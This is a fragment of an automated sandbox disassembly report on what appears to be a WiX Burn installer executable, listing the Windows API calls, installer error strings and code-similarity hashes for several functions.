GetLastError.KERNEL32(?,?,?,?,008C08BC,?,?), ref: 008C0D2F
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,008C08BC,?,?), ref: 008C0D74
GetLastError.KERNEL32(?,?,?,?,008C08BC,?,?), ref: 008C0D7F
ResetEvent.KERNEL32(?,?,?,?,?,008C08BC,?,?), ref: 008C0DB7
GetLastError.KERNEL32(?,?,?,?,008C08BC,?,?), ref: 008C0DC1

Strings

Failed to reset begin operation event., xrefs: 008C0DEF, 008C0F2B
Failed to wait for begin operation event., xrefs: 008C0DAD, 008C0EE6
Invalid operation for this state., xrefs: 008C0E1D
cabextract.cpp, xrefs: 008C0D53, 008C0DA3, 008C0DE5, 008C0E11, 008C0E94, 008C0EDC, 008C0F21, 008C0F89, 008C0FF4, 008C1045, 008C108A, 008C10CE
Failed to copy stream name: %ls, xrefs: 008C0E50
Failed to set file pointer to end of file., xrefs: 008C104F
Failed to set end of file., xrefs: 008C1094
Failed to set operation complete event., xrefs: 008C0D5D, 008C0E9E
Failed to allocate buffer for stream., xrefs: 008C0F93
Failed to create file: %ls, xrefs: 008C1001
Failed to set file pointer to beginning of file., xrefs: 008C10D8

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorLast$Event$ObjectResetSingleWait
String ID: Failed to allocate buffer for stream.$Failed to copy stream name: %ls$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
API String ID: 1865021742-2104912459
Opcode ID: 67fa4e53de7ca434be5b3f3206f5b6053979cc92699a4c6e1f6e3c17fc97b309
Instruction ID: d23c0f7ed631079315a291f1b657473ac579bc0f93949f7b45b2013c0d29363e
Opcode Fuzzy Hash: 67fa4e53de7ca434be5b3f3206f5b6053979cc92699a4c6e1f6e3c17fc97b309
Instruction Fuzzy Hash: 32910873A80A36A7D73116A94D89F2A2960FF01B71F114629BF24FE6D1D774EC408AD2

Function 008A4D39 Relevance: 38.7, APIs: 6, Strings: 16, Instructions: 220
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008A33C7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,008A10DD,?,00000000), ref: 008A33E8

CloseHandle.KERNEL32(00000000,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 008A4F40
CloseHandle.KERNEL32(000000FF,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 008A4F4F
CloseHandle.KERNEL32(000000FF,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 008A4F5E
CloseHandle.KERNEL32(?,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 008A4F69

Strings

Failed to cache to clean room., xrefs: 008A4DC2
Failed to wait for clean room process: %ls, xrefs: 008A4F23
%ls %ls, xrefs: 008A4E55
"%ls" %ls, xrefs: 008A4E7A
Failed to get path for current process., xrefs: 008A4D83
Failed to append original command line., xrefs: 008A4E69
-%ls="%ls", xrefs: 008A4DE6
Failed to allocate parameters for unelevated process., xrefs: 008A4DFA
user.cpp, xrefs: 008A4EEA
burn.clean.room, xrefs: 008A4DDE
burn.filehandle.self, xrefs: 008A4E45
burn.filehandle.attached, xrefs: 008A4E17
Failed to append %ls, xrefs: 008A4E1C
D, xrefs: 008A4EA9
Failed to allocate full command-line., xrefs: 008A4E8E
Failed to launch clean room process: %ls, xrefs: 008A4EF7

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CloseHandle$FileModuleName
String ID: "%ls" %ls$%ls %ls$-%ls="%ls"$D$Failed to allocate full command-line.$Failed to allocate parameters for unelevated process.$Failed to append %ls$Failed to append original command line.$Failed to cache to clean room.$Failed to get path for current process.$Failed to launch clean room process: %ls$Failed to wait for clean room process: %ls$burn.clean.room$burn.filehandle.attached$burn.filehandle.self$user.cpp
API String ID: 3884789274-2391192076
Opcode ID: fa6c898ff8febf382ac296ac03725d46cc098688fa147a47e75e194361cb0e60
Instruction ID: 08583ca5d3c3c072124356a6b8cd7417b020b9e4f9a99a289a7703e401e9169b
Opcode Fuzzy Hash: fa6c898ff8febf382ac296ac03725d46cc098688fa147a47e75e194361cb0e60
Instruction Fuzzy Hash: 8371A732D0026AAADF219B99CC45EEFBB78FF46720F101121F920F7651DBB49A418BD1

Function 008B752A Relevance: 37.0, APIs: 1, Strings: 20, Instructions: 291
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to initialize internal cache functionality., xrefs: 008B779F
Failed to set source process folder variable., xrefs: 008B7745
Failed to get manifest stream from container., xrefs: 008B75CC
WixBundleElevated, xrefs: 008B76A5, 008B76B6
Failed to load catalog files., xrefs: 008B780F
Failed to parse command line., xrefs: 008B7667
WixBundleUILevel, xrefs: 008B76D6, 008B76E7
WixBundleOriginalSource, xrefs: 008B7759
Failed to load manifest., xrefs: 008B75E8
Failed to initialize variables., xrefs: 008B7571
Failed to open manifest stream., xrefs: 008B75AB
WixBundleSourceProcessFolder, xrefs: 008B7734
Failed to overwrite the %ls built-in variable., xrefs: 008B76BB
WixBundleSourceProcessPath, xrefs: 008B76F8
Failed to extract bootstrapper application payloads., xrefs: 008B77EF
Failed to set original source variable., xrefs: 008B776A
Failed to get unique temporary folder for bootstrapper application., xrefs: 008B77CE
Failed to open attached UX container., xrefs: 008B758E
Failed to set source process path variable., xrefs: 008B7709
Failed to get source process folder from path., xrefs: 008B7725

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CriticalInitializeSection
String ID: Failed to extract bootstrapper application payloads.$Failed to get manifest stream from container.$Failed to get source process folder from path.$Failed to get unique temporary folder for bootstrapper application.$Failed to initialize internal cache functionality.$Failed to initialize variables.$Failed to load catalog files.$Failed to load manifest.$Failed to open attached UX container.$Failed to open manifest stream.$Failed to overwrite the %ls built-in variable.$Failed to parse command line.$Failed to set original source variable.$Failed to set source process folder variable.$Failed to set source process path variable.$WixBundleElevated$WixBundleOriginalSource$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleUILevel
API String ID: 32694325-1564579409
Opcode ID: 047ff97960c5b9a3851eae56cc928db95a268b59bd85a390489b10c36cbe3ea5
Instruction ID: 73ffc80307970de953e6285ab4cb207ec89d8a9774b4f0cbcce78ae541984a06
Opcode Fuzzy Hash: 047ff97960c5b9a3851eae56cc928db95a268b59bd85a390489b10c36cbe3ea5
Instruction Fuzzy Hash: 21A19472E4471ABADB229AA4CC85EEFB76CFB45700F000626F615E7341DB34E904CBA5

Function 008B86D0 Relevance: 35.2, APIs: 9, Strings: 11, Instructions: 209
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,40000000,00000005,00000000,00000002,08000080,00000000,?,00000000,00000000,008A4DBC,?,?,00000000,008A4DBC,00000000), ref: 008B8713
GetLastError.KERNEL32 ref: 008B8720

Part of subcall function 008E3EDD: ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 008E3F73

SetFilePointerEx.KERNEL32(00000000,008EB4B8,00000000,00000000,00000000,?,00000000,008EB500,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008B87CD
GetLastError.KERNEL32 ref: 008B87D7
CloseHandle.KERNELBASE(00000000,?,00000000,008EB500,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008B8902

Strings

Failed to update signature offset., xrefs: 008B8821
Failed to seek to checksum in exe header., xrefs: 008B8805
Failed to create user file at path: %ls, xrefs: 008B8751
Failed to seek to signature table in exe header., xrefs: 008B886C
cabinet.dll, xrefs: 008B887B
Failed to zero out original data offset., xrefs: 008B88F4
msi.dll, xrefs: 008B8814
Failed to seek to beginning of user file: %ls, xrefs: 008B8779
Failed to copy user from: %ls to: %ls, xrefs: 008B87A8
Failed to seek to original data in exe burn section header., xrefs: 008B88DB
cache.cpp, xrefs: 008B8744, 008B87FB, 008B8862, 008B88D1

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: File$ErrorLast$CloseCreateHandlePointerRead
String ID: Failed to copy user from: %ls to: %ls$Failed to create user file at path: %ls$Failed to seek to beginning of user file: %ls$Failed to seek to checksum in exe header.$Failed to seek to original data in exe burn section header.$Failed to seek to signature table in exe header.$Failed to update signature offset.$Failed to zero out original data offset.$cabinet.dll$cache.cpp$msi.dll
API String ID: 3456208997-1976062716
Opcode ID: cfc1a9cb8f3777c8d0941b0474653a4df8f6d70f754cea6c03e3dba50a3f827a
Instruction ID: ae013666e95a9cbfe687d46b6a51e8b66402542924efa2d45a1c48a4a3cb4aa4
Opcode Fuzzy Hash: cfc1a9cb8f3777c8d0941b0474653a4df8f6d70f754cea6c03e3dba50a3f827a
Instruction Fuzzy Hash: 8D518772A4163AEBEB125A644C46EBF7A6CFF05760F110524FE10FB391EB549C00D6E6

Function 008A762C Relevance: 34.9, APIs: 1, Strings: 22, Instructions: 420
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.KERNEL32(008B756B,008A53BD,00000000,008A5445), ref: 008A764C

Strings

WixBundleForcedRestartPackage, xrefs: 008A7E14
InstallerVersion, xrefs: 008A7833
Failed to add built-in variable: %ls., xrefs: 008A7F19
WixBundleElevated, xrefs: 008A7E46
WixBundleActiveParent, xrefs: 008A7E62
WixBundleUILevel, xrefs: 008A7EBE
0, xrefs: 008A7663
WixBundleProviderKey, xrefs: 008A7E7E
WixBundleTag, xrefs: 008A7EAE
WixBundleAction, xrefs: 008A7D76
WixBundleExecutePackageAction, xrefs: 008A7DF8
WixBundleExecutePackageCacheFolder, xrefs: 008A7D98
', xrefs: 008A78EB
WixBundleSourceProcessFolder, xrefs: 008A7E9E
Date, xrefs: 008A7770
WixBundleSourceProcessPath, xrefs: 008A7E8E
$, xrefs: 008A7D49
#, xrefs: 008A76CB
WixBundleVersion, xrefs: 008A7ECE
WixBundleInstalled, xrefs: 008A7E2A
LogonUser, xrefs: 008A7882
InstallerName, xrefs: 008A7812

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CriticalInitializeSection
String ID: #$$$'$0$Date$Failed to add built-in variable: %ls.$InstallerName$InstallerVersion$LogonUser$WixBundleAction$WixBundleActiveParent$WixBundleElevated$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$WixBundleForcedRestartPackage$WixBundleInstalled$WixBundleProviderKey$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleTag$WixBundleUILevel$WixBundleVersion
API String ID: 32694325-3635313340
Opcode ID: 27f70ad6fdc25ed548110677e25702ec723fa5fff98de6c1eeaec69e55cdf54d
Instruction ID: 7e48ce966174a1b45639423d4ee64c8c0f85ae3db3630855896fba1c8fafb468
Opcode Fuzzy Hash: 27f70ad6fdc25ed548110677e25702ec723fa5fff98de6c1eeaec69e55cdf54d
Instruction Fuzzy Hash: B6324BB0C116699FEB65CF9AC9887DDFAB4FB4A304F5041EED61CA6210D7B00B898F45

Function 008B82BA Relevance: 33.4, APIs: 7, Strings: 12, Instructions: 153
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000000,00000000,00000000,008A5489), ref: 008B8310

Part of subcall function 008E0879: OpenProcessToken.ADVAPI32(?,00000008,?,008A53BD,00000000,?,?,?,?,?,?,?,008B769D,00000000), ref: 008E0897
Part of subcall function 008E0879: GetLastError.KERNEL32(?,?,?,?,?,?,?,008B769D,00000000), ref: 008E08A1
Part of subcall function 008E0879: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,008B769D,00000000), ref: 008E092B

GetWindowsDirectoryW.KERNEL32(?,00000104,00000000), ref: 008B8336
GetLastError.KERNEL32 ref: 008B8340
GetTempPathW.KERNEL32(00000104,?,00000000), ref: 008B83BD
GetLastError.KERNEL32 ref: 008B83C7
UuidCreate.RPCRT4(?), ref: 008B8406

Strings

Failed to convert working folder guid into string., xrefs: 008B8446
%ls%ls\, xrefs: 008B8458
Failed to get temp path for working folder., xrefs: 008B83F5
Failed to ensure windows path for working folder ended in backslash., xrefs: 008B838B
Failed to concat Temp directory on windows path for working folder., xrefs: 008B83AD
4#v, xrefs: 008B83BD
Failed to copy working folder path., xrefs: 008B848B
Failed to create working folder guid., xrefs: 008B8413
Temp\, xrefs: 008B8395
cache.cpp, xrefs: 008B8364, 008B83EB, 008B843C
Failed to append bundle id on to temp path for working folder., xrefs: 008B8470
Failed to get windows path for working folder., xrefs: 008B836E

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorLast$Process$CloseCreateCurrentDirectoryHandleOpenPathTempTokenUuidWindows
String ID: 4#v$%ls%ls\$Failed to append bundle id on to temp path for working folder.$Failed to concat Temp directory on windows path for working folder.$Failed to convert working folder guid into string.$Failed to copy working folder path.$Failed to create working folder guid.$Failed to ensure windows path for working folder ended in backslash.$Failed to get temp path for working folder.$Failed to get windows path for working folder.$Temp\$cache.cpp
API String ID: 266130487-3587817078
Opcode ID: 3c54dd05c309287c8a791fd9efbda0e48a24dc5c28284b6341b2f19dee3469a6
Instruction ID: 0973f10bd32a22c963127a293954f4c21ea8fc864dc6b9ceff5ab06f4c055fc6
Opcode Fuzzy Hash: 3c54dd05c309287c8a791fd9efbda0e48a24dc5c28284b6341b2f19dee3469a6
Instruction Fuzzy Hash: 0741B572A40729EBD73096A48C4AFEB76ACFB04B10F114165BB04F7340EE789D0486E5

Function 008C10FB Relevance: 30.0, APIs: 8, Strings: 9, Instructions: 217
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 008C111D
CoUninitialize.COMBASE ref: 008C1398

Strings

Failed to reset begin operation event., xrefs: 008C1350
Failed to wait for begin operation event., xrefs: 008C1311
Invalid operation for this state., xrefs: 008C137C
cabextract.cpp, xrefs: 008C1193, 008C12BA, 008C1307, 008C1346, 008C1372
Failed to initialize cabinet.dll., xrefs: 008C119F
<the>.cab, xrefs: 008C11BD
Failed to initialize COM., xrefs: 008C1129
Failed to set operation complete event., xrefs: 008C12C4
Failed to extract all files from container, erf: %d:%X:%d, xrefs: 008C1279

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: InitializeUninitialize
String ID: <the>.cab$Failed to extract all files from container, erf: %d:%X:%d$Failed to initialize COM.$Failed to initialize cabinet.dll.$Failed to reset begin operation event.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
API String ID: 3442037557-1168358783
Opcode ID: 5d2ac8ba06bd72f96d0662f245351b2905d7aa06ca3a6669d772486e7dd8714c
Instruction ID: 7298eb0d06385bda54e87ed6df4b97a0a43323312cbd5f8060c8ed0a9a279fe9
Opcode Fuzzy Hash: 5d2ac8ba06bd72f96d0662f245351b2905d7aa06ca3a6669d772486e7dd8714c
Instruction Fuzzy Hash: 4B51173AA401A5D79F2096A48C89F6B2675FB03774B22036DBD21FB792D67CCC0096D6

Function 008A42D7 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 158
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,?,?,008A5266,?,?,00000000,?,?), ref: 008A4303
InitializeCriticalSection.KERNEL32(000000D0,?,?,008A5266,?,?,00000000,?,?), ref: 008A430C
lstrlenW.KERNEL32(burn.filehandle.attached,000004B8,000004A0,?,?,008A5266,?,?,00000000,?,?), ref: 008A4352
lstrlenW.KERNEL32(burn.filehandle.attached,burn.filehandle.attached,00000000,?,?,008A5266,?,?,00000000,?,?), ref: 008A435C
CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,008A5266,?,?,00000000,?,?), ref: 008A4370
lstrlenW.KERNEL32(burn.filehandle.attached,?,?,008A5266,?,?,00000000,?,?), ref: 008A4380
lstrlenW.KERNEL32(burn.filehandle.self,?,?,008A5266,?,?,00000000,?,?), ref: 008A43D0
lstrlenW.KERNEL32(burn.filehandle.self,burn.filehandle.self,00000000,?,?,008A5266,?,?,00000000,?,?), ref: 008A43DA
CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,008A5266,?,?,00000000,?,?), ref: 008A43EE
lstrlenW.KERNEL32(burn.filehandle.self,?,?,008A5266,?,?,00000000,?,?), ref: 008A43FE

Strings

user.cpp, xrefs: 008A4495, 008A44C1
burn.filehandle.self, xrefs: 008A43CB, 008A43D3, 008A43D8, 008A43D9, 008A43F9, 008A44CB
burn.filehandle.attached, xrefs: 008A434D, 008A4355, 008A435A, 008A435B, 008A437B, 008A449F
Missing required parameter for switch: %ls, xrefs: 008A44A4
Failed to parse file handle: '%ls', xrefs: 008A4482
Failed to initialize user section., xrefs: 008A4467

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: lstrlen$CompareCriticalInitializeSectionString
String ID: Failed to initialize user section.$Failed to parse file handle: '%ls'$Missing required parameter for switch: %ls$burn.filehandle.attached$burn.filehandle.self$user.cpp
API String ID: 3039292287-3209860532
Opcode ID: 78a32eb909fceeedf782fff15c4bcb5ecc3872956767e30b2e6e32555d0ae115
Instruction ID: 6f5459cf223c1e18ab05c4471d38e95f92ca2710b299ad3e66706a97c6ff762a
Opcode Fuzzy Hash: 78a32eb909fceeedf782fff15c4bcb5ecc3872956767e30b2e6e32555d0ae115
Instruction Fuzzy Hash: EA51D671A01265BFDB20DB69CC86F9B7768FF46760F100125FA14D73A0D7B4A910CBA5

Function 008AC28F Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 131
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,?,00000000,00000000,?,008AC47F,008A5405,?,?,008A5445), ref: 008AC2D6
GetLastError.KERNEL32(?,008AC47F,008A5405,?,?,008A5445,008A5445,00000000,?,00000000), ref: 008AC2E7
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,?,00000000,00000000,?,008AC47F,008A5405,?,?,008A5445,008A5445,00000000,?), ref: 008AC336
GetCurrentProcess.KERNEL32(000000FF,00000000,?,008AC47F,008A5405,?,?,008A5445,008A5445,00000000,?,00000000), ref: 008AC33C
DuplicateHandle.KERNELBASE(00000000,?,008AC47F,008A5405,?,?,008A5445,008A5445,00000000,?,00000000), ref: 008AC33F
GetLastError.KERNEL32(?,008AC47F,008A5405,?,?,008A5445,008A5445,00000000,?,00000000), ref: 008AC349
SetFilePointerEx.KERNELBASE(?,00000000,00000000,00000000,00000000,?,008AC47F,008A5405,?,?,008A5445,008A5445,00000000,?,00000000), ref: 008AC39B
GetLastError.KERNEL32(?,008AC47F,008A5405,?,?,008A5445,008A5445,00000000,?,00000000), ref: 008AC3A5

Strings

Failed to duplicate handle to container: %ls, xrefs: 008AC37A
Failed to open file: %ls, xrefs: 008AC318
Failed to move file pointer to container offset., xrefs: 008AC3D3
feclient.dll, xrefs: 008AC398
container.cpp, xrefs: 008AC30B, 008AC36D, 008AC3C9
Failed to open container., xrefs: 008AC3F1
crypt32.dll, xrefs: 008AC397

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
String ID: Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$container.cpp$crypt32.dll$feclient.dll
API String ID: 2619879409-373955632
Opcode ID: 9c4023dd80f1ff970c910b47b1e9b6eaa8170924195899a733e22b3ab58330ea
Instruction ID: f86b8d47cc661cb2235c1d3c0bcddccdfc321b46070a09664bd3ba7c14bd5990
Opcode Fuzzy Hash: 9c4023dd80f1ff970c910b47b1e9b6eaa8170924195899a733e22b3ab58330ea
Instruction Fuzzy Hash: 7841D736140241ABEF219F5A8C49E1B7BA5FFC6720F218429FA24EF352D775D801DBA0

Function 008E2AF7 Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 79
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008A3838: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 008A3877
Part of subcall function 008A3838: GetLastError.KERNEL32 ref: 008A3881

Part of subcall function 008E4A6C: GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 008E4A9D

GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,00000000), ref: 008E2B41
GetProcAddress.KERNEL32(MsiDetermineApplicablePatchesW), ref: 008E2B61
GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 008E2B81
GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 008E2BA1
GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 008E2BC1
GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 008E2BE1
GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 008E2C01

Strings

MsiDetermineApplicablePatchesW, xrefs: 008E2B56
MsiSetExternalUIRecord, xrefs: 008E2BD6
MsiSourceListAddSourceExW, xrefs: 008E2BF6
MsiGetPatchInfoExW, xrefs: 008E2B96
MsiDeterminePatchSequenceW, xrefs: 008E2B36
Msi.dll, xrefs: 008E2B09
MsiEnumProductsExW, xrefs: 008E2B76
MsiGetProductInfoExW, xrefs: 008E2BB6

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: AddressProc$ErrorLast$DirectorySystem
String ID: Msi.dll$MsiDetermineApplicablePatchesW$MsiDeterminePatchSequenceW$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW
API String ID: 2510051996-1735120554
Opcode ID: 676861e373ab58a743d1599860935b3247021609e6e168d9b0c6085b0dee16d5
Instruction ID: e27c12b745c32fafd25f577242ec6ea257ed15f945a486e21707f8086bb1d357
Opcode Fuzzy Hash: 676861e373ab58a743d1599860935b3247021609e6e168d9b0c6085b0dee16d5
Instruction Fuzzy Hash: 95310A729A9648EFDB119F21ED02B157BE8F795338F00022AE404962B0EBB30895FF54

Function 008C1741 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 106COMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,wininet.dll,?,00000000,00000000,00000000,?,?,008AC3EB,?,00000000,?,008AC47F), ref: 008C1778
GetLastError.KERNEL32(?,008AC3EB,?,00000000,?,008AC47F,008A5405,?,?,008A5445,008A5445,00000000,?,00000000), ref: 008C1781

Strings

Failed to wait for operation complete., xrefs: 008C1854
Failed to copy file name., xrefs: 008C1763
Failed to create operation complete event., xrefs: 008C17F5
cabextract.cpp, xrefs: 008C17A5, 008C17EB, 008C1837
wininet.dll, xrefs: 008C1757
Failed to create extraction thread., xrefs: 008C1841
Failed to create begin operation event., xrefs: 008C17AF

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CreateErrorEventLast
